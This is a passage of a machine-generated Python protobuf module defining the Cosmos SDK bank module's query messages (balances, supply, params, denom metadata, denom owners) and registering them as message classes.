\x01(\x0b\x32\'.cosmos.base.query.v1beta1.PageResponse\"*\n\x19QueryDenomMetadataRequest\x12\r\n\x05\x64\x65nom\x18\x01 \x01(\t\"S\n\x1aQueryDenomMetadataResponse\x12\x35\n\x08metadata\x18\x01 \x01(\x0b\x32\x1d.cosmos.bank.v1beta1.MetadataB\x04\xc8\xde\x1f\x00\"d\n\x17QueryDenomOwnersRequest\x12\r\n\x05\x64\x65nom\x18\x01 \x01(\t\x12:\n\npagination\x18\x02 \x01(\x0b\x32&.cosmos.base.query.v1beta1.PageRequest\"i\n\nDenomOwner\x12)\n\x07\x61\x64\x64ress\x18\x01 \x01(\tB\x18\xd2\xb4-\x14\x63osmos.AddressString\x12\x30\n\x07\x62\x61lance\x18\x02 \x01(\x0b\x32\x19.cosmos.base.v1beta1.CoinB\x04\xc8\xde\x1f\x00\"\x8e\x01\n\x18QueryDenomOwnersResponse\x12\x35\n\x0c\x64\x65nom_owners\x18\x01 \x03(\x0b\x32\x1f.cosmos.bank.v1beta1.DenomOwner\x12;\n\npagination\x18\x02 \x01(\x0b\x32\'.cosmos.base.query.v1beta1.PageResponse2\xd3\t\n\x05Query\x12\x98\x01\n\x07\x42\x61lance\x12(.cosmos.bank.v1beta1.QueryBalanceRequest\x1a).cosmos.bank.v1beta1.QueryBalanceResponse\"8\x82\xd3\xe4\x93\x02\x32\x12\x30/cosmos/bank/v1beta1/balances/{address}/by_denom\x12\x9b\x01\n\x0b\x41llBalances\x12,.cosmos.bank.v1beta1.QueryAllBalancesRequest\x1a-.cosmos.bank.v1beta1.QueryAllBalancesResponse\"/\x82\xd3\xe4\x93\x02)\x12\'/cosmos/bank/v1beta1/balances/{address}\x12\x8f\x01\n\x0bTotalSupply\x12,.cosmos.bank.v1beta1.QueryTotalSupplyRequest\x1a-.cosmos.bank.v1beta1.QueryTotalSupplyResponse\"#\x82\xd3\xe4\x93\x02\x1d\x12\x1b/cosmos/bank/v1beta1/supply\x12\x8e\x01\n\x08SupplyOf\x12).cosmos.bank.v1beta1.QuerySupplyOfRequest\x1a*.cosmos.bank.v1beta1.QuerySupplyOfResponse\"+\x82\xd3\xe4\x93\x02%\x12#/cosmos/bank/v1beta1/supply/{denom}\x12\x80\x01\n\x06Params\x12\'.cosmos.bank.v1beta1.QueryParamsRequest\x1a(.cosmos.bank.v1beta1.QueryParamsResponse\"#\x82\xd3\xe4\x93\x02\x1d\x12\x1b/cosmos/bank/v1beta1/params\x12\xa6\x01\n\rDenomMetadata\x12..cosmos.bank.v1beta1.QueryDenomMetadataRequest\x1a/.cosmos.bank.v1beta1.QueryDenomMetadataResponse\"4\x82\xd3\xe4\x93\x02.\x12,/cosmos/bank/v1beta1/denoms_metadata/{denom}\x12\xa1\x01\n\x0e\x44\x65nomsMetadata\x12/.cosmos.bank.v1beta1.QueryDenomsMetadataRequest\x1a\x30.cosmos.bank.v1beta1.QueryDenomsMetadataResponse\",\x82\xd3\xe4\x93\x02&\x12$/cosmos/bank/v1beta1/denoms_metadata\x12\x9d\x01\n\x0b\x44\x65nomOwners\x12,.cosmos.bank.v1beta1.QueryDenomOwnersRequest\x1a-.cosmos.bank.v1beta1.QueryDenomOwnersResponse\"1\x82\xd3\xe4\x93\x02+\x12)/cosmos/bank/v1beta1/denom_owners/{denom}B+Z)github.com/cosmos/cosmos-sdk/x/bank/typesb\x06proto3'
,
dependencies=[cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2.DESCRIPTOR,gogoproto_dot_gogo__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,cosmos_dot_base_dot_v1beta1_dot_coin__pb2.DESCRIPTOR,cosmos_dot_bank_dot_v1beta1_dot_bank__pb2.DESCRIPTOR,cosmos__proto_dot_cosmos__pb2.DESCRIPTOR,])
_QUERYBALANCEREQUEST = _descriptor.Descriptor(
name='QueryBalanceRequest',
full_name='cosmos.bank.v1beta1.QueryBalanceRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='address', full_name='cosmos.bank.v1beta1.QueryBalanceRequest.address', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\322\264-\024cosmos.AddressString', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='denom', full_name='cosmos.bank.v1beta1.QueryBalanceRequest.denom', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'\350\240\037\000\210\240\037\000',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=243,
serialized_end=332,
)
_QUERYBALANCERESPONSE = _descriptor.Descriptor(
name='QueryBalanceResponse',
full_name='cosmos.bank.v1beta1.QueryBalanceResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='balance', full_name='cosmos.bank.v1beta1.QueryBalanceResponse.balance', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=334,
serialized_end=400,
)
_QUERYALLBALANCESREQUEST = _descriptor.Descriptor(
name='QueryAllBalancesRequest',
full_name='cosmos.bank.v1beta1.QueryAllBalancesRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='address', full_name='cosmos.bank.v1beta1.QueryAllBalancesRequest.address', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\322\264-\024cosmos.AddressString', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryAllBalancesRequest.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'\350\240\037\000\210\240\037\000',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=403,
serialized_end=541,
)
_QUERYALLBALANCESRESPONSE = _descriptor.Descriptor(
name='QueryAllBalancesResponse',
full_name='cosmos.bank.v1beta1.QueryAllBalancesResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='balances', full_name='cosmos.bank.v1beta1.QueryAllBalancesResponse.balances', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000\252\337\037(github.com/cosmos/cosmos-sdk/types.Coins', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryAllBalancesResponse.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=544,
serialized_end=726,
)
_QUERYTOTALSUPPLYREQUEST = _descriptor.Descriptor(
name='QueryTotalSupplyRequest',
full_name='cosmos.bank.v1beta1.QueryTotalSupplyRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryTotalSupplyRequest.pagination', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'\350\240\037\000\210\240\037\000',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=728,
serialized_end=823,
)
_QUERYTOTALSUPPLYRESPONSE = _descriptor.Descriptor(
name='QueryTotalSupplyResponse',
full_name='cosmos.bank.v1beta1.QueryTotalSupplyResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='supply', full_name='cosmos.bank.v1beta1.QueryTotalSupplyResponse.supply', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000\252\337\037(github.com/cosmos/cosmos-sdk/types.Coins', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryTotalSupplyResponse.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=826,
serialized_end=1006,
)
_QUERYSUPPLYOFREQUEST = _descriptor.Descriptor(
name='QuerySupplyOfRequest',
full_name='cosmos.bank.v1beta1.QuerySupplyOfRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='denom', full_name='cosmos.bank.v1beta1.QuerySupplyOfRequest.denom', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1008,
serialized_end=1045,
)
_QUERYSUPPLYOFRESPONSE = _descriptor.Descriptor(
name='QuerySupplyOfResponse',
full_name='cosmos.bank.v1beta1.QuerySupplyOfResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='amount', full_name='cosmos.bank.v1beta1.QuerySupplyOfResponse.amount', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1047,
serialized_end=1119,
)
_QUERYPARAMSREQUEST = _descriptor.Descriptor(
name='QueryParamsRequest',
full_name='cosmos.bank.v1beta1.QueryParamsRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1121,
serialized_end=1141,
)
_QUERYPARAMSRESPONSE = _descriptor.Descriptor(
name='QueryParamsResponse',
full_name='cosmos.bank.v1beta1.QueryParamsResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='params', full_name='cosmos.bank.v1beta1.QueryParamsResponse.params', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1143,
serialized_end=1215,
)
_QUERYDENOMSMETADATAREQUEST = _descriptor.Descriptor(
name='QueryDenomsMetadataRequest',
full_name='cosmos.bank.v1beta1.QueryDenomsMetadataRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryDenomsMetadataRequest.pagination', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1217,
serialized_end=1305,
)
_QUERYDENOMSMETADATARESPONSE = _descriptor.Descriptor(
name='QueryDenomsMetadataResponse',
full_name='cosmos.bank.v1beta1.QueryDenomsMetadataResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadatas', full_name='cosmos.bank.v1beta1.QueryDenomsMetadataResponse.metadatas', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryDenomsMetadataResponse.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1308,
serialized_end=1454,
)
_QUERYDENOMMETADATAREQUEST = _descriptor.Descriptor(
name='QueryDenomMetadataRequest',
full_name='cosmos.bank.v1beta1.QueryDenomMetadataRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='denom', full_name='cosmos.bank.v1beta1.QueryDenomMetadataRequest.denom', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1456,
serialized_end=1498,
)
_QUERYDENOMMETADATARESPONSE = _descriptor.Descriptor(
name='QueryDenomMetadataResponse',
full_name='cosmos.bank.v1beta1.QueryDenomMetadataResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='metadata', full_name='cosmos.bank.v1beta1.QueryDenomMetadataResponse.metadata', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1500,
serialized_end=1583,
)
_QUERYDENOMOWNERSREQUEST = _descriptor.Descriptor(
name='QueryDenomOwnersRequest',
full_name='cosmos.bank.v1beta1.QueryDenomOwnersRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='denom', full_name='cosmos.bank.v1beta1.QueryDenomOwnersRequest.denom', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryDenomOwnersRequest.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1585,
serialized_end=1685,
)
_DENOMOWNER = _descriptor.Descriptor(
name='DenomOwner',
full_name='cosmos.bank.v1beta1.DenomOwner',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='address', full_name='cosmos.bank.v1beta1.DenomOwner.address', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\322\264-\024cosmos.AddressString', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='balance', full_name='cosmos.bank.v1beta1.DenomOwner.balance', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\310\336\037\000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1687,
serialized_end=1792,
)
_QUERYDENOMOWNERSRESPONSE = _descriptor.Descriptor(
name='QueryDenomOwnersResponse',
full_name='cosmos.bank.v1beta1.QueryDenomOwnersResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='denom_owners', full_name='cosmos.bank.v1beta1.QueryDenomOwnersResponse.denom_owners', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='pagination', full_name='cosmos.bank.v1beta1.QueryDenomOwnersResponse.pagination', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1795,
serialized_end=1937,
)
_QUERYBALANCERESPONSE.fields_by_name['balance'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYALLBALANCESREQUEST.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGEREQUEST
_QUERYALLBALANCESRESPONSE.fields_by_name['balances'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYALLBALANCESRESPONSE.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGERESPONSE
_QUERYTOTALSUPPLYREQUEST.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGEREQUEST
_QUERYTOTALSUPPLYRESPONSE.fields_by_name['supply'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYTOTALSUPPLYRESPONSE.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGERESPONSE
_QUERYSUPPLYOFRESPONSE.fields_by_name['amount'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYPARAMSRESPONSE.fields_by_name['params'].message_type = cosmos_dot_bank_dot_v1beta1_dot_bank__pb2._PARAMS
_QUERYDENOMSMETADATAREQUEST.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGEREQUEST
_QUERYDENOMSMETADATARESPONSE.fields_by_name['metadatas'].message_type = cosmos_dot_bank_dot_v1beta1_dot_bank__pb2._METADATA
_QUERYDENOMSMETADATARESPONSE.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGERESPONSE
_QUERYDENOMMETADATARESPONSE.fields_by_name['metadata'].message_type = cosmos_dot_bank_dot_v1beta1_dot_bank__pb2._METADATA
_QUERYDENOMOWNERSREQUEST.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGEREQUEST
_DENOMOWNER.fields_by_name['balance'].message_type = cosmos_dot_base_dot_v1beta1_dot_coin__pb2._COIN
_QUERYDENOMOWNERSRESPONSE.fields_by_name['denom_owners'].message_type = _DENOMOWNER
_QUERYDENOMOWNERSRESPONSE.fields_by_name['pagination'].message_type = cosmos_dot_base_dot_query_dot_v1beta1_dot_pagination__pb2._PAGERESPONSE
DESCRIPTOR.message_types_by_name['QueryBalanceRequest'] = _QUERYBALANCEREQUEST
DESCRIPTOR.message_types_by_name['QueryBalanceResponse'] = _QUERYBALANCERESPONSE
DESCRIPTOR.message_types_by_name['QueryAllBalancesRequest'] = _QUERYALLBALANCESREQUEST
DESCRIPTOR.message_types_by_name['QueryAllBalancesResponse'] = _QUERYALLBALANCESRESPONSE
DESCRIPTOR.message_types_by_name['QueryTotalSupplyRequest'] = _QUERYTOTALSUPPLYREQUEST
DESCRIPTOR.message_types_by_name['QueryTotalSupplyResponse'] = _QUERYTOTALSUPPLYRESPONSE
DESCRIPTOR.message_types_by_name['QuerySupplyOfRequest'] = _QUERYSUPPLYOFREQUEST
DESCRIPTOR.message_types_by_name['QuerySupplyOfResponse'] = _QUERYSUPPLYOFRESPONSE
DESCRIPTOR.message_types_by_name['QueryParamsRequest'] = _QUERYPARAMSREQUEST
DESCRIPTOR.message_types_by_name['QueryParamsResponse'] = _QUERYPARAMSRESPONSE
DESCRIPTOR.message_types_by_name['QueryDenomsMetadataRequest'] = _QUERYDENOMSMETADATAREQUEST
DESCRIPTOR.message_types_by_name['QueryDenomsMetadataResponse'] = _QUERYDENOMSMETADATARESPONSE
DESCRIPTOR.message_types_by_name['QueryDenomMetadataRequest'] = _QUERYDENOMMETADATAREQUEST
DESCRIPTOR.message_types_by_name['QueryDenomMetadataResponse'] = _QUERYDENOMMETADATARESPONSE
DESCRIPTOR.message_types_by_name['QueryDenomOwnersRequest'] = _QUERYDENOMOWNERSREQUEST
DESCRIPTOR.message_types_by_name['DenomOwner'] = _DENOMOWNER
DESCRIPTOR.message_types_by_name['QueryDenomOwnersResponse'] = _QUERYDENOMOWNERSRESPONSE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
QueryBalanceRequest = _reflection.GeneratedProtocolMessageType('QueryBalanceRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYBALANCEREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryBalanceRequest)
})
_sym_db.RegisterMessage(QueryBalanceRequest)
QueryBalanceResponse = _reflection.GeneratedProtocolMessageType('QueryBalanceResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYBALANCERESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryBalanceResponse)
})
_sym_db.RegisterMessage(QueryBalanceResponse)
QueryAllBalancesRequest = _reflection.GeneratedProtocolMessageType('QueryAllBalancesRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYALLBALANCESREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryAllBalancesRequest)
})
_sym_db.RegisterMessage(QueryAllBalancesRequest)
QueryAllBalancesResponse = _reflection.GeneratedProtocolMessageType('QueryAllBalancesResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYALLBALANCESRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryAllBalancesResponse)
})
_sym_db.RegisterMessage(QueryAllBalancesResponse)
QueryTotalSupplyRequest = _reflection.GeneratedProtocolMessageType('QueryTotalSupplyRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYTOTALSUPPLYREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryTotalSupplyRequest)
})
_sym_db.RegisterMessage(QueryTotalSupplyRequest)
QueryTotalSupplyResponse = _reflection.GeneratedProtocolMessageType('QueryTotalSupplyResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYTOTALSUPPLYRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryTotalSupplyResponse)
})
_sym_db.RegisterMessage(QueryTotalSupplyResponse)
QuerySupplyOfRequest = _reflection.GeneratedProtocolMessageType('QuerySupplyOfRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYSUPPLYOFREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QuerySupplyOfRequest)
})
_sym_db.RegisterMessage(QuerySupplyOfRequest)
QuerySupplyOfResponse = _reflection.GeneratedProtocolMessageType('QuerySupplyOfResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYSUPPLYOFRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QuerySupplyOfResponse)
})
_sym_db.RegisterMessage(QuerySupplyOfResponse)
QueryParamsRequest = _reflection.GeneratedProtocolMessageType('QueryParamsRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYPARAMSREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryParamsRequest)
})
_sym_db.RegisterMessage(QueryParamsRequest)
QueryParamsResponse = _reflection.GeneratedProtocolMessageType('QueryParamsResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYPARAMSRESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryParamsResponse)
})
_sym_db.RegisterMessage(QueryParamsResponse)
QueryDenomsMetadataRequest = _reflection.GeneratedProtocolMessageType('QueryDenomsMetadataRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMSMETADATAREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomsMetadataRequest)
})
_sym_db.RegisterMessage(QueryDenomsMetadataRequest)
QueryDenomsMetadataResponse = _reflection.GeneratedProtocolMessageType('QueryDenomsMetadataResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMSMETADATARESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomsMetadataResponse)
})
_sym_db.RegisterMessage(QueryDenomsMetadataResponse)
QueryDenomMetadataRequest = _reflection.GeneratedProtocolMessageType('QueryDenomMetadataRequest', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMMETADATAREQUEST,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomMetadataRequest)
})
_sym_db.RegisterMessage(QueryDenomMetadataRequest)
QueryDenomMetadataResponse = _reflection.GeneratedProtocolMessageType('QueryDenomMetadataResponse', (_message.Message,), {
'DESCRIPTOR' : _QUERYDENOMMETADATARESPONSE,
'__module__' : 'cosmos.bank.v1beta1.query_pb2'
# @@protoc_insertion_point(class_scope:cosmos.bank.v1beta1.QueryDenomMetadataResponse)
})
_sym_db.RegisterMessage(QueryDenomMetadataResponse)
